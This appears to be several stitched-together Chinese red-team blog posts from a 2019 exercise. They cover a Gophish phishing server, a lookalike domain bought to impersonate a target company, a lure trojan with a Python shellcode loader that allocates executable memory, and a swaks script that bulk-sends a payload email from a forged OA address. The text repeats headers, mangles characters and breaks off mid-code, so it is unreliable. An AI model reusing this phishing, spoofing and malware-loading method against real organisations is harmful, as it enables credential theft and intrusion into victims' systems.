@大家好.... hw.... 练习生 .... 唱 跳 rap 和 篮球...snowming
此文写于护网期间(2019年6月6日),彼时刚刚回国,就碰上了护网,弥足珍贵的经历。
Gophish 是一个功能强大的开源网络钓��框架。
Github 地址:https://github.com/gophish/gophish
安装运行非常简单:
STEP1:在https://github.com/gophish/gophish/releases/下载适合自己的zip包至自己的VPS。
我下载的是:
wget https://github.com/gophish/gophish/releases/download/0.7.1/gophish-v0.7.1-linux-64bit.zip
解压完有以下这些文件:
STEP2:修改 config.json:
要注意:
STEP3:./gophish 运行(如果不行就加个sudo):
STEP4: 快乐访问admin后台:https://VPS IP: admin_server的监听端口
比如我的就是 https://148.70.xx.xx:443
使用默认账号密码 admin
gophish
来 login。
就进入了后台:
比如说我想对一个叫snowm1ng的公司钓鱼,他们公司的邮件格式是: xxx@snowm1ng.me。
那么为了发钓��邮件,我就专门去狗爹购买了一个近似域名
snowming.me,这样的话后面我们就可以以 admin@snowming.me 为发件人去发一些钓鱼邮件。
在此近似域名的DNS管理
@大家好.... hw.... 练习生 .... 唱 跳 rap 和 篮球...snowming
此文写于护网期间(2019年6月6日),彼时刚刚回国,就碰上了护网,弥足珍贵的经历。
雪茗私房照.exe
主要是 gophish+自己搭建邮件服务器 这篇文章里面用到的木马。
在本文中,详细介绍了此木马文件的制作过程。
from ctypes import *
import ctypes
#shellcode代码
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.k
1、买近似域名绑定 QQ 邮箱的域名邮箱
。
2、 确定邮件模板,下载 eml。可以通过 foxmail 对 eml 再次编辑或者修改纯文本。
3 、sh 脚本跑 swaks 批量发。
#!/bin/bash
sleep 10s
./swaks --header-X-Mailer whu-online.cn --to zhangsan@whu.com.cn --from OA@whu-online.cn --data ./payload.eml
sleep 10s
./swaks --header-X-Mailer whu-online.cn --to lisi@whu.com.cn --from OA@whu-online.cn --data ./payload.eml
注1:whu-online.cn 为伪造的域名域,也可以写 foxmail.com,qq.com 等。
注2:我就是通过这种弱智 sh 脚本批量发的,怎么写成这种 n 行的 sh 脚本呢?写一个 python 脚本把批量发的目标依次拼接成 shell 语句。